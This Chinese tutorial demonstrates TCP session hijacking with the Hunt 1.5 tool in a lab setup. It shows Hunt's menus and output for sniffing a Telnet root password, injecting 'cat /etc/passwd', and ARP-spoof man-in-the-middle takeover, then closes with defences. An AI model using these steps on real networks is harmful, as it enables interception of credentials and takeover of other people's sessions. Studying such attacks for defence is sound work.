要知道很多工具都可以进行会话劫持，比如说相对常用的juggernaut、TTY Watcher，还有如Dsniff这样的工具包也可以实现会话劫持。但是本此的会话劫持实例演示还是通过经典工具Hunt来进行。Hunt可以说是功能非常强大，并且可以把会话劫持技术发挥得淋漓尽致。

本次会话劫持实例演示所使用的Hunt是1.5，可以到Pavel Krauz网站下载源代码包和二进制文件：

lin.fsid.cvut.cz/~kra/#hunt。

现在来看看如果使用Hunt，首先是下载并编译源代码：

[root@dahubaobao hunt]#wget

[root@dahubaobao>www.ringz.org/hunt-1.5.tgz

[root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz

[root@dahubaobao hunt]#cd hunt-1.5

[root@dahubaobao hunt-1.5]#make

[root@dahubaobao hunt-1.5]#./hunt

//Hunt是完全交互试的操作

解释一下各个选项的含义

l/w/r) list/watch/reset connections

//l(字母l)为查看当前网络上的会话；w为监视当前网络上的某个会话；r为重置当前网络上的某个会话。

a) arp/simple hijack (avoids ack storm if arp used)

//中间人攻击(会话劫持)，Hunt先进行ARP欺骗，然后进行会话劫持。使用此方法可以避免出现ACK风暴。

s) simple hijack

//简单的会话劫持，也就是注射式攻击。会出现ACK风暴。

d) daemons rst/arp/sniff/mac

//该选项共实现四个功能，分别为：终止会话，自动发送带RST标志位的TCP包；ARP欺骗后进行数据包转发；不用说了，嗅探功能；在当前网络上收集MAC地址。

其他的选项很简单，不在多说了。还是来看看具体的例子吧，我想大家都等不及了！^_^

应用实例

测试环境：

攻击者：Red Hat Linux 9.0 IP：192.168.0.10

主机A：Windows Advanced Server IP：192.168.0.1

主机B：FreeBSD 4.9 STABLE IP：192.168.0.20

[root@dahubaobao hunt-1.5]#./hunt

/*

* hunt 1.5

* multipurpose connection intruder / sniffer for Linux

* (c) 1998-2000 by kra

*/

starting hunt

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ l //查看当前网络上的会话

　0)192.168.0.1 [3465] ?192.168.0.20 [23]

//主机A正在Telnet到主机B

--- Main Menu --- rcvpkt 0, fr

ee/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ w //监视当前网络上的会话

0)192.168.0.1 [3465] ?192.168.0.20 [23]

Choose conn＞0 //选择打算监视的会话。由于我的条件有限，不能模拟多个会话，请多见量。

Dump [s]rc/[d]st/[b]oth [b]＞ //回车

Print sec/dst same charactes y/n [n]＞ //回车 现在就可以监视会话了。主机A输入的一切内容，我们都可以看到。主机A在Telnet并登陆之后，直接su root，password：后边的就是root的密码。现在这个系统已经完全由你所控制了，自由发挥吧！

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ s //进行注射式会话劫持

0)192.168.0.1 [3465] ?192.168.0.20 [23]

choose conn＞ 0

dump connection y/n [n]＞

Enter the command string you wish executed or [cr]＞ cat /etc/passwd#p#

攻击者的意图是获取主机B的passwd文件的内容，但由于注射式会话劫持缺陷，导致了ACK风暴，所以Hunt向会话双方发送了一个带RST标志位的TCP包来阻止ACK风暴。

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ a //进行中间人会话劫持

0)192.168.0.1 [3862] ?192.168.0.20 [23]

choose conn＞ 0

arp spoof src in dst y/n [y]＞

src MAC [XX:XX:XX:XX:XX:XX]＞

arp spoof dst in src y/n [y]＞

dst MAC [XX:XX:XX:XX:XX:XX]＞

input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]＞

dump connectin y/n [y]＞ n

press key to take voer of connection

ARP spoof of 192.168.0.20 with fake mac XX:XX:XX:XX:XX:XX in host 192.168.0.1 FA

ILED

do you want to force arp spoof nutil successed y/n [y]＞

CTRL-C to break

CTRL+C //手工输入CTRL+C中断，不需等待

-- operation canceled - press any key＞

ARP spoof failed

ARP spoof of 192.168.0.20 in host 192.168.0.1 FAILED

you took over the connection

CTRL-] to break

-bash-2.05b$id

....................

在这次会话劫持实例的演示中，攻击者已经成功的劫持了主机A和B之间的Telnet会话。主机A输入的一切命令攻击者都可以看到，并且攻击者也可以自行插入命令。正如前边所说的，这种会话劫持方式先进行ARP欺骗，然后才劫持，所以，ACK风暴是不会出现的；而且，这种方式要比注射式会话劫持危害更大，从上文中我想就能看出来，我就不必在多说什么了。还有一些如Sniffer等功能，都很简单，由于已不在本文范畴，故不在多说。

会话劫持防范

防范会话劫持是一个比较大的工程。首先应该使用交换式网络替代共享式网络，虽然像Hunt这样的工具可以在交换环境中实现会话劫持，但还是应该使用交换式网络替代共享式网络，因为这样可以防范最基本的嗅探攻击。然而，最根本的解决办法是采用加密通讯，使用SSH代替Telnet、使用SSL代替HTTP，或者干脆使用IPSec/VPN，这样会话劫持就无用武之地了。其次，监视网络流量，如发现网络中出现大量的ACK包，则有可能已被进行了会话劫持攻击。

还有一点是比较重要的，就是防范ARP欺骗。
 

【编辑推荐】

1. 黑客不爱软件漏洞　更喜欢利用错误配置
2. “90后”黑客攻击南京房管局网站
3. Black Hat和Defcon黑客大会的五大看点
4. 路由器漏洞:黑客展示如何攻陷百万台
5. 揭秘黑客手中DDoS攻击利器——黑色能量2代